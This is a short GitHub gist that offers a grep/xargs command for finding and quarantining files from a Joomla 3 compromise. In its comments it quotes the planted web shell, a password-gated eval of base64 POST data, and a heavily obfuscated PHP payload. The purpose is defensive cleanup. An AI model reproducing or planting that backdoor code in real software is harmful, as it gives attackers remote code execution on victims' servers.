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Created February 26, 2015 09:35
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Save appsol/c0c0776f6861d6562310 to your computer and use it in GitHub Desktop.
Regex to clean up Joomla 3 hack of administrator/components/com_joomlaupdate/
# The hack places the following file in administrator/components/com_joomlaupdate/config.php:
# <?php
# echo"trest";error_reporting(0);
# if(isset($_POST['com']) && md5($_POST['com']) == '66d18dc9cbd1b87d4460a2ce37d8e835' && isset($_POST['content'])) $kk = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($kk));
# echo"abrval";
# ?>
# This creates many files of a similar pattern throughout the Joomla install, e.g.
# '?<omz(b#L*/"ov}U_{_}"._RM_t____."}";$EUiJC3='#'.p5Vg.'('.foFa.'*p>0K,50'^/*Nl'.
# 'Yh8mg*/"{%C&8p9!)6W/`M&CjC";$kzDhU4Asu=eHhw."<i|q"^'W+YG^_KA';$dBywBcXMj='SS8'.
# '[;6'^'46L4U@';$_vKFCCB4xDo='k{'.oqte_vwnowmoo&gzoyuo_fu.'~'.wwmoo;$VtR11P='a?'.
# 'd.'^')k0~';$HfH=J|U;$lhAjEPd0b=A&'}';$fuV8Y8nvBAc='6[tOQ|q=_Az]%'.loicOB.'+r4'.
# 'C#'^'T:'.ExiKAYkpJjC.']]]Vz '.OGUsB;$xYX5Cp1sQ_=('SBC$2K'|'LZD B')^(#DKcV_y0'.
# 'ewV!rk'^IYcf.'-P');$wfgvd1K2O=$gyIRi^('Y{_'&'u?~');$bhAAnwVPm=$dBywBcXMj&('/I'.
# '?%6-'^'X&APH[');$niPNTbW9tt=('qgf|l&'.syuw_RlK&gAtoW.'}'.uaxVF.']lS')|(#Vhe28'.
# '14'.YF5u.'%4D +UR|'^SUqbj.' Fqv{M`4]');$y3Lhyph=('c2`'.ADG_1.'}'.oZTCg.'^'|#q'.
# '2@ei}`'.PW5m.'#'.pjir)&$_vKFCCB4xDo;$NiOqLK7=$hSij&$EUiJC3;if(!$xYX5Cp1sQ_(/*'.
# 'p*/$wfgvd1K2O($bhAAnwVPm($VtR11P.$HfH.$lhAjEPd0b)),$kzDhU4Asu.$fuV8Y8nvBAc))/*'.
# '1Hbpfdc*/$niPNTbW9tt($y3Lhyph(false,$bhAAnwVPm($NiOqLK7)));#T[gl+<ZBOcaZeN}H'.
# 'h_ MG0H8o>Lwat9cN_zKE7v2af=m^$TG #Vs(4_ygDM+=zK1x1br&wYx|';
# This is obviously some type of base64 encoded and generally obfuscated payload designed for execution later.
# I believe it may be to send out spam from your servers SMTP.
# To clean these out run the following from the directory below the Joomla install.
# If your Joomla directory is not public_html you will need to rename public_html to the name of your Joomla install directory
# The script will take all the files it finds that match the pattern and deposit them in the directory bad/
# Hope this helps. Stuart.
grep -l -r -Z -E "^\\\$[A-Za-z]+='.{77}'\.$" public_html | xargs -0 -I{} mv {} bad/
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